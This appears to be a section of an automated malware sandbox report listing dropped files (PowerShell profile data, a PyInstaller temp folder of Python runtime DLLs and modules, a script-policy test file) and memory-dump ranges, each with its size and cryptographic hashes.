                                                                                              b984bb6024ecafd440b7feb83720333c0e87a0b014143a05fd5d30324e92953448ac70e9815bc96b2a45bd2a8c96b79f87532040e2b69eab1039053df8df8c2f

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              64B

                                                                                              MD5

                                                                                              d9fbd004c6ef009dc296538cdd0062a6

                                                                                              SHA1

                                                                                              b805fe342d545a92c2a92f9f0867a104fd78c275

                                                                                              SHA256

                                                                                              053ce5ffa45ec806bddb8865aabbf20315a598cb53022eeeab1e7ffc53b5c6ac

                                                                                              SHA512

                                                                                              78457addba78fb3c99015a776fd715fec2e4e4e3fe6df8b534490d40af3666536b3eb0cf59768f6ea70e3e5a511edaf6c8a8cc295f6f59c1b7ee0917700c3cf0

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              96ff1ee586a153b4e7ce8661cabc0442

                                                                                              SHA1

                                                                                              140d4ff1840cb40601489f3826954386af612136

                                                                                              SHA256

                                                                                              0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

                                                                                              SHA512

                                                                                              3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              83685d101174171875b4a603a6c2a35c

                                                                                              SHA1

                                                                                              37be24f7c4525e17fa18dbd004186be3a9209017

                                                                                              SHA256

                                                                                              0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870

                                                                                              SHA512

                                                                                              005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              e60eb305a7b2d9907488068b7065abd3

                                                                                              SHA1

                                                                                              1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

                                                                                              SHA256

                                                                                              ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

                                                                                              SHA512

                                                                                              95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              e3161f4edbc9b963debe22e29658050b

                                                                                              SHA1

                                                                                              45dbf88dadafe5dd1cfee1e987c8a219d3208cdb

                                                                                              SHA256

                                                                                              1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a

                                                                                              SHA512

                                                                                              006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              6e09573715495338a569f0316d59af57

                                                                                              SHA1

                                                                                              1a9fd3073801c241b276cdb8b3d7035afbcd0c8d

                                                                                              SHA256

                                                                                              bdad2d4c1b3475754cb3b9ef41a9eda243f46e30117539f81399c977a459b570

                                                                                              SHA512

                                                                                              61add4e0cfef5f138e95f0d941c39c0bce038a47fbc262d5622a0fdf46621231653adfcca3b81bef3a662a37c288e1e9644bed44591551aea5399a370afaeced

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Filesize

                                                                                              944B

                                                                                              MD5

                                                                                              0aa63dbb46d451e47a7a682c64af776d

                                                                                              SHA1

                                                                                              3b0026f2dae8e9c491ccaa40133755779de35aaa

                                                                                              SHA256

                                                                                              9158038718d41172c22a3c1a15852405e3e1c8e2c44fa066328eb1520e5d977b

                                                                                              SHA512

                                                                                              4d2564850c2ab1bc71089412f19147df4a1cd3075aa2039aa894271b333cd9c510b7ba4d70889f24d45d8b366d8b5167abdcf24314e4753420337c7d34e7c43f

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\VCRUNTIME140.dll

                                                                                              Filesize

                                                                                              116KB

                                                                                              MD5

                                                                                              be8dbe2dc77ebe7f88f910c61aec691a

                                                                                              SHA1

                                                                                              a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                                                                                              SHA256

                                                                                              4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                                                                                              SHA512

                                                                                              0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_bz2.pyd

                                                                                              Filesize

                                                                                              83KB

                                                                                              MD5

                                                                                              223fd6748cae86e8c2d5618085c768ac

                                                                                              SHA1

                                                                                              dcb589f2265728fe97156814cbe6ff3303cd05d3

                                                                                              SHA256

                                                                                              f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb

                                                                                              SHA512

                                                                                              9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_cffi_backend.cp312-win_amd64.pyd

                                                                                              Filesize

                                                                                              178KB

                                                                                              MD5

                                                                                              0572b13646141d0b1a5718e35549577c

                                                                                              SHA1

                                                                                              eeb40363c1f456c1c612d3c7e4923210eae4cdf7

                                                                                              SHA256

                                                                                              d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7

                                                                                              SHA512

                                                                                              67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_ctypes.pyd

                                                                                              Filesize

                                                                                              122KB

                                                                                              MD5

                                                                                              bbd5533fc875a4a075097a7c6aba865e

                                                                                              SHA1

                                                                                              ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00

                                                                                              SHA256

                                                                                              be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570

                                                                                              SHA512

                                                                                              23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_decimal.pyd

                                                                                              Filesize

                                                                                              245KB

                                                                                              MD5

                                                                                              3055edf761508190b576e9bf904003aa

                                                                                              SHA1

                                                                                              f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890

                                                                                              SHA256

                                                                                              e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577

                                                                                              SHA512

                                                                                              87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_hashlib.pyd

                                                                                              Filesize

                                                                                              64KB

                                                                                              MD5

                                                                                              eedb6d834d96a3dffffb1f65b5f7e5be

                                                                                              SHA1

                                                                                              ed6735cfdd0d1ec21c7568a9923eb377e54b308d

                                                                                              SHA256

                                                                                              79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2

                                                                                              SHA512

                                                                                              527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_lzma.pyd

                                                                                              Filesize

                                                                                              156KB

                                                                                              MD5

                                                                                              05e8b2c429aff98b3ae6adc842fb56a3

                                                                                              SHA1

                                                                                              834ddbced68db4fe17c283ab63b2faa2e4163824

                                                                                              SHA256

                                                                                              a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c

                                                                                              SHA512

                                                                                              badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\_socket.pyd

                                                                                              Filesize

                                                                                              81KB

                                                                                              MD5

                                                                                              dc06f8d5508be059eae9e29d5ba7e9ec

                                                                                              SHA1

                                                                                              d666c88979075d3b0c6fd3be7c595e83e0cb4e82

                                                                                              SHA256

                                                                                              7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a

                                                                                              SHA512

                                                                                              57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\base_library.zip

                                                                                              Filesize

                                                                                              1.3MB

                                                                                              MD5

                                                                                              08332a62eb782d03b959ba64013ac5bc

                                                                                              SHA1

                                                                                              b70b6ae91f1bded398ca3f62e883ae75e9966041

                                                                                              SHA256

                                                                                              8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288

                                                                                              SHA512

                                                                                              a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\cryptography\hazmat\bindings\_rust.pyd

                                                                                              Filesize

                                                                                              6.9MB

                                                                                              MD5

                                                                                              61d63fbd7dd1871392997dd3cef6cc8e

                                                                                              SHA1

                                                                                              45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9

                                                                                              SHA256

                                                                                              ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5

                                                                                              SHA512

                                                                                              c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\libcrypto-3.dll

                                                                                              Filesize

                                                                                              5.0MB

                                                                                              MD5

                                                                                              e547cf6d296a88f5b1c352c116df7c0c

                                                                                              SHA1

                                                                                              cafa14e0367f7c13ad140fd556f10f320a039783

                                                                                              SHA256

                                                                                              05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

                                                                                              SHA512

                                                                                              9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\libffi-8.dll

                                                                                              Filesize

                                                                                              38KB

                                                                                              MD5

                                                                                              0f8e4992ca92baaf54cc0b43aaccce21

                                                                                              SHA1

                                                                                              c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                                                                                              SHA256

                                                                                              eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                                                                                              SHA512

                                                                                              6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\python3.DLL

                                                                                              Filesize

                                                                                              66KB

                                                                                              MD5

                                                                                              79b02450d6ca4852165036c8d4eaed1f

                                                                                              SHA1

                                                                                              ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4

                                                                                              SHA256

                                                                                              d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123

                                                                                              SHA512

                                                                                              47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\python312.dll

                                                                                              Filesize

                                                                                              6.6MB

                                                                                              MD5

                                                                                              3c388ce47c0d9117d2a50b3fa5ac981d

                                                                                              SHA1

                                                                                              038484ff7460d03d1d36c23f0de4874cbaea2c48

                                                                                              SHA256

                                                                                              c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

                                                                                              SHA512

                                                                                              e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\select.pyd

                                                                                              Filesize

                                                                                              29KB

                                                                                              MD5

                                                                                              92b440ca45447ec33e884752e4c65b07

                                                                                              SHA1

                                                                                              5477e21bb511cc33c988140521a4f8c11a427bcc

                                                                                              SHA256

                                                                                              680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3

                                                                                              SHA512

                                                                                              40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

                                                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI29282\unicodedata.pyd

                                                                                              Filesize

                                                                                              1.1MB

                                                                                              MD5

                                                                                              16be9a6f941f1a2cb6b5fca766309b2c

                                                                                              SHA1

                                                                                              17b23ae0e6a11d5b8159c748073e36a936f3316a

                                                                                              SHA256

                                                                                              10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04

                                                                                              SHA512

                                                                                              64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nxzp20l4.1nd.ps1

                                                                                              Filesize

                                                                                              60B

                                                                                              MD5

                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                              SHA1

                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                              SHA256

                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                              SHA512

                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                            • memory/1680-197-0x00007FFA1EFC0000-0x00007FFA1F0CB000-memory.dmp

                                                                                              Filesize

                                                                                              1.0MB

                                                                                            • memory/1680-207-0x000001BE11BC0000-0x000001BE11BE2000-memory.dmp

                                                                                              Filesize

                                                                                              136KB

                                                                                            • memory/1680-210-0x00007FFA1EFC0000-0x00007FFA1F0CB000-memory.dmp

                                                                                              Filesize

                                                                                              1.0MB